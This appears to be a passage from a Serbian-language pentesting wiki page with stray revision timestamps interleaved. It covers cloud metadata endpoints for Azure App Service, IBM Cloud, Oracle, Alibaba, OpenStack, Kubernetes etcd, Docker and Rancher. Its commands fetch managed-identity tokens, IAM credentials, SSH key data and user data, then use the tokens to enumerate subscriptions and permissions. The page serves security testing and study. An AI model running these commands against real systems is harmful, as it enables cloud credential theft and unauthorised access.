$userData = Invoke- RestMethod -Headers @{"Metadata"="true"} -Method GET -Uri "http://169.254.169.254/metadata/instance/compute/userData?api-version=2021- 01-01& format=text"
[System.Text.Encoding]::UTF8.GetString([Convert]::FromBase64String($userData))
2022-09-25 22:19:09 +00:00
# Paths
/metadata/instance?api-version=2017-04-02
/metadata/instance/network/interface/0/ipv4/ipAddress/0/publicIpAddress?api-version=2017-04-02& format=text
/metadata/instance/compute/userData?api-version=2021-01-01& format=text
2022-02-13 12:30:13 +00:00
```
2022-09-29 13:18:42 +00:00
### Azure App Service
2022-09-25 14:14:17 +00:00
2024-02-23 16:45:30 +00:00
Iz **env** možete dobiti vrednosti `IDENTITY_HEADER` _i_ `IDENTITY_ENDPOINT` . To možete koristiti da biste prikupili token za komunikaciju sa serverom metapodataka.
2022-09-25 14:14:17 +00:00
2024-02-10 13:11:20 +00:00
Većinu vremena, želite token za jedan od ovih resursa:
2022-10-26 12:49:19 +00:00
* [https://storage.azure.com ](https://storage.azure.com/ )
* [https://vault.azure.net ](https://vault.azure.net/ )
* [https://graph.microsoft.com ](https://graph.microsoft.com/ )
* [https://management.azure.com ](https://management.azure.com/ )
2022-09-25 14:14:17 +00:00
```bash
# Check for those env vars to know if you are in an Azure app
echo $IDENTITY_HEADER
echo $IDENTITY_ENDPOINT
# You should also be able to find the folder:
ls /opt/microsoft
#and the file
ls /opt/microsoft/msodbcsql17
2022-09-25 14:51:27 +00:00
# Get management token
2022-09-25 14:14:17 +00:00
curl "$IDENTITY_ENDPOINT?resource=https://management.azure.com/& api-version=2017-09-01" -H secret:$IDENTITY_HEADER
2022-09-25 14:51:27 +00:00
# Get graph token
curl "$IDENTITY_ENDPOINT?resource=https://graph.azure.com/& api-version=2017-09-01" -H secret:$IDENTITY_HEADER
2022-09-25 14:14:17 +00:00
# API
# Get Subscriptions
URL="https://management.azure.com/subscriptions?api-version=2020-01-01"
curl -H "Authorization: $TOKEN" "$URL"
# Get current permission on resources in the subscription
URL="https://management.azure.com/subscriptions/< subscription-uid > /resources?api-version=2020-10-01'"
curl -H "Authorization: $TOKEN" "$URL"
# Get permissions in a VM
URL="https://management.azure.com/subscriptions/< subscription-uid > /resourceGroups/Engineering/providers/Microsoft.Compute/virtualMachines/< VM-name > /providers/Microsoft.Authorization/permissions?api-version=2015-07-01"
curl -H "Authorization: $TOKEN" "$URL"
```
```powershell
2022-09-25 14:51:27 +00:00
# API request in powershell to management endpoint
2022-09-25 14:14:17 +00:00
$Token = 'eyJ0eX..'
$URI='https://management.azure.com/subscriptions?api-version=2020-01-01'
2022-09-25 14:51:27 +00:00
$RequestParams = @{
2024-02-10 13:11:20 +00:00
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
2022-09-25 14:51:27 +00:00
}
(Invoke-RestMethod @RequestParams ).value
# API request to graph endpoint (get enterprise applications)
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
2022-09-25 14:14:17 +00:00
$RequestParams = @{
2024-02-10 13:11:20 +00:00
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
2022-09-25 14:14:17 +00:00
}
(Invoke-RestMethod @RequestParams ).value
2022-09-25 14:51:27 +00:00
# Using AzureAD Powershell module witho both management and graph tokens
$token = 'eyJ0e..'
$graphaccesstoken = 'eyJ0eX..'
Connect-AzAccount -AccessToken $token -GraphAccessToken $graphaccesstoken -AccountId 2e91a4f12984-46ee-2736-e32ff2039abc
# Try to get current perms over resources
Get-AzResource
## The following error means that the user doesn't have permissions over any resource
Get-AzResource : 'this.Client.SubscriptionId' cannot be null.
At line:1 char:1
+ Get-AzResource
+ ~~~~~~~~~~~~~~
2024-02-10 13:11:20 +00:00
+ CategoryInfo : CloseError: (:) [Get-AzResource],ValidationException
+ FullyQualifiedErrorId :
2022-09-25 14:51:27 +00:00
Microsoft.Azure.Commands.ResourceManager.Cmdlets.Implementation.GetAzureResourceCmdlet
2022-09-25 14:14:17 +00:00
```
2024-03-24 12:28:49 +00:00
## IBM Cloud <a href="#id-2af0" id="id-2af0"></a>
2023-02-10 12:30:22 +00:00
{% hint style="warning" %}
2024-03-24 12:28:49 +00:00
Imajte na umu da u IBM-u podrazumevano nije omogućen metapodaci, tako da je moguće da im nećete moći pristupiti čak i ako ste unutar IBM-ovog cloud VM-a.
2023-02-10 12:30:22 +00:00
{% endhint %}
{% code overflow="wrap" %}
```bash
export instance_identity_token=`curl -s -X PUT "http://169.254.169.254/instance_identity/v1/token?version=2022-03-01"\
2024-02-10 13:11:20 +00:00
-H "Metadata-Flavor: ibm"\
-H "Accept: application/json"\
-d '{
"expires_in": 3600
}' | jq -r '(.access_token)'`
2023-02-10 12:30:22 +00:00
# Get instance details
curl -s -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" -X GET "http://169.254.169.254/metadata/v1/instance?version=2022-03-01" | jq
# Get SSH keys info
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/keys?version=2022-03-01" | jq
# Get SSH keys fingerprints & user data
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/instance/initialization?version=2022-03-01" | jq
# Get placement groups
curl -s -X GET -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/metadata/v1/placement_groups?version=2022-03-01" | jq
# Get IAM credentials
curl -s -X POST -H "Accept: application/json" -H "Authorization: Bearer $instance_identity_token" "http://169.254.169.254/instance_identity/v1/iam_token?version=2022-03-01" | jq
```
{% endcode %}
2024-03-14 23:38:08 +00:00
Dokumentacija za različite platforme metadata servisa je detaljno opisana u nastavku, ističući metode putem kojih se može pristupiti konfiguracionim i informacijama o izvršavanju instanci. Svaka platforma nudi jedinstvene endpointe za pristup svojim metadata servisima.
2024-02-06 03:10:27 +00:00
## Packetcloud
2023-02-10 12:30:22 +00:00
2024-02-23 16:45:30 +00:00
Za pristup metapodacima Packetcloud-a, dokumentacija se može pronaći na: [https://metadata.packet.net/userdata ](https://metadata.packet.net/userdata )
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## OpenStack/RackSpace
2022-02-13 12:30:13 +00:00
2024-03-14 23:38:08 +00:00
Nije navedena potreba za zaglavljem. Metapodaci se mogu pristupiti putem:
2024-02-23 16:45:30 +00:00
* `http://169.254.169.254/openstack`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## HP Helion
2022-02-13 12:30:13 +00:00
2024-02-10 13:11:20 +00:00
Ni ovde nije navedena potreba za zaglavljem. Metapodaci su dostupni na:
2024-02-23 16:45:30 +00:00
* `http://169.254.169.254/2009-04-04/meta-data/`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## Oracle Cloud
2022-02-13 12:30:13 +00:00
2024-02-10 13:11:20 +00:00
Oracle Cloud pruža niz endpointa za pristup različitim aspektima metapodataka:
2024-02-23 16:45:30 +00:00
* `http://192.0.0.192/latest/`
* `http://192.0.0.192/latest/user-data/`
* `http://192.0.0.192/latest/meta-data/`
* `http://192.0.0.192/latest/attributes/`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## Alibaba
2022-02-13 12:30:13 +00:00
2024-03-14 23:38:08 +00:00
Alibaba nudi endpointe za pristup metapodacima, uključujući instance i ID slike:
2024-02-23 16:45:30 +00:00
* `http://100.100.100.200/latest/meta-data/`
* `http://100.100.100.200/latest/meta-data/instance-id`
* `http://100.100.100.200/latest/meta-data/image-id`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## Kubernetes ETCD
2022-02-13 12:30:13 +00:00
2024-02-23 16:45:30 +00:00
Kubernetes ETCD može sadržati API ključeve, interne IP adrese i portove. Pristup je prikazan putem:
* `curl -L http://127.0.0.1:2379/version`
* `curl http://127.0.0.1:2379/v2/keys/?recursive=true`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## Docker
2022-02-13 12:30:13 +00:00
2024-03-24 13:29:10 +00:00
Docker metapodaci se mogu pristupiti lokalno, sa primerima za dobijanje informacija o kontejnerima i slikama:
2024-02-23 16:45:30 +00:00
* Jednostavan primer za pristup metapodacima kontejnera i slika putem Docker socketa:
* `docker run -ti -v /var/run/docker.sock:/var/run/docker.sock bash`
* Unutar kontejnera, koristite curl sa Docker socketom:
* `curl --unix-socket /var/run/docker.sock http://foo/containers/json`
* `curl --unix-socket /var/run/docker.sock http://foo/images/json`
2022-02-13 12:30:13 +00:00
2024-02-06 03:10:27 +00:00
## Rancher
2022-02-13 12:30:13 +00:00
2024-03-24 13:29:10 +00:00
Metapodaci Rancher-a se mogu pristupiti korišćenjem:
2022-02-13 12:30:13 +00:00
2024-02-23 16:45:30 +00:00
* `curl http://rancher-metadata/<version>/<path>`